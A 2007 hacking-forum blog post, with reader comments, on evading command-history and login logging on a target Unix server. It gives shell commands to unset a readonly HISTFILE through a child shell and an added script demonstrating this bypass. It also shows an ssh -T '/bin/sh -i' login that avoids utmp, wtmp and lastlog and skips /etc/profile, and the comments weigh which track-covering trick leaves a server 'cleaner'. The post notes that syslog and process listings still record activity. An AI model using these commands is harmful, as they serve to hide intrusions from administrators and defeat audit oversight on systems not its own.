Posted by kecoak on Oct 22, 2007

[tips n trick] ReadOnly environment variable bypass

Someone /at/ k-elektronik posted a simple method for getting around readonly environment variables on a target machine. The example case is an admin who restricts access to HISTFILE by declaring it readonly in /etc/profile, so that a user cannot unset it and stop bash from writing the session's command history. The readonly flag, however, is an attribute of the variable inside that particular bash process, not a property of the exported environment: a child shell receives the value of HISTFILE through the environment but not the readonly attribute, so unset succeeds there. Here is the simple PoC to bypass the restriction:

——- Cut here ———-

[~]$ cat /etc/profile|grep readonly
readonly -a HISTFILE
readonly HISTFILESIZE
readonly HISTSIZE
readonly HISTIGNORE
readonly PATH
readonly bash

[~]$ echo $HISTFILE
/home/audit/user.history
[~]$ unset HISTFILE
-bash: unset: HISTFILE: cannot unset: readonly variable
[~]$ sh
sh-3.1$ echo $HISTFILE
/home/audit/user.history
sh-3.1$ unset HISTFILE
sh-3.1$ echo $HISTFILE

sh-3.1$ echo bypassed
bypassed
sh-3.1$

——- Cut here ———-
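The transcript above can be reproduced without a victim box. The script below is an added example, not code from the original post or the forum: it declares HISTFILE readonly inside one bash process, confirms that unset is refused there, then starts a child sh from that process and shows that the child inherits the value but not the readonly attribute. The history path is a constructed sample value mirroring the post.

```shell
#!/bin/sh
# Added example (not from the original post): `readonly` is an attribute
# kept inside one shell process, not a property of the exported environment.
# A child shell inherits the VALUE of HISTFILE but not the readonly flag,
# so it can unset it. The path below is a constructed sample value.

SAMPLE_HISTFILE=/home/audit/user.history   # constructed, mirrors the post

# 1. In the bash process that declared the variable readonly, unset must fail.
#    Returns 0 when bash refuses the unset and the value is untouched.
parent_refuses_unset() {
    bash -c '
        export HISTFILE="$1"
        readonly HISTFILE
        if unset HISTFILE 2>/dev/null; then
            exit 1            # readonly was not enforced: unexpected
        fi
        [ "$HISTFILE" = "$1" ]
    ' bash "$SAMPLE_HISTFILE"
}

# 2. A child sh started from that process gets HISTFILE in its environment
#    but carries no readonly attribute for it, so unset succeeds.
#    Returns 0 when the child could unset the variable (the bypass).
child_can_unset() {
    bash -c '
        export HISTFILE="$1"
        readonly HISTFILE
        exec sh -c '\''unset HISTFILE && [ -z "${HISTFILE:-}" ]'\''
    ' bash "$SAMPLE_HISTFILE"
}

# 3. The child's own readonly list does not mention HISTFILE at all.
#    Returns 0 when `readonly -p` in the child does not list HISTFILE.
child_has_no_readonly_attr() {
    bash -c '
        export HISTFILE="$1"
        readonly HISTFILE
        exec sh -c '\''! readonly -p | grep -q HISTFILE'\''
    ' bash "$SAMPLE_HISTFILE"
}

# Run the three checks and report what happened.
run_demo() {
    parent_refuses_unset       && echo "parent bash: unset refused (readonly enforced)"
    child_can_unset            && echo "child sh:    unset succeeded (bypassed)"
    child_has_no_readonly_attr && echo "child sh:    readonly -p does not list HISTFILE"
}

run_demo
```

The same result follows for any other child process, including `bash` itself started as a child, which is why a readonly declared in /etc/profile is a convenience for the admin rather than a control: the attribute never crosses an exec boundary.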

The other trick is to log in to the server without allocating a tty. A session without a tty is not recorded in utmp, wtmp or lastlog, and the remote command is started by the login shell in non-interactive, non-login mode, so /etc/profile (and the readonly declarations it contains) is never read. Here is how to log in without a tty:

$ ssh -T -l <user> <IP> "/bin/sh -i"

Note that this only hides the session from the utmp-family tools (who, w, last); sshd still logs the authentication itself to syslog, and the resulting processes are still visible to ps and to any host audit framework.

Taken from: http://kecoak-elektronik.net/forum/viewtopic.php?t=1006


2 Responses to “[tips n trick] ReadOnly environment variable bypass”

  1. I prefer to use the old trick, a symbolic link 🙂
    log out and everything is gone (I think it is the reverse of how unset is treated)

    but thanks for the tip about switching shells; remember that only bash is readonly 🙂
    ..thanks, yeah.. 🙂

  2. Someone [at] kecoak says:

    I tend to prefer using unset HISTFILE over a symbolic link, because using a symbolic link means there is a change that you made, and that reduces the "cleanliness" of the server.

    As for switching shells and being able to unset HISTFILE in sh: it is not because only bash is readonly; go ahead and make it readonly in sh, it should still be bypassable. The issue is that most unix/linux systems only support one shell HISTFILE.

    Regards,
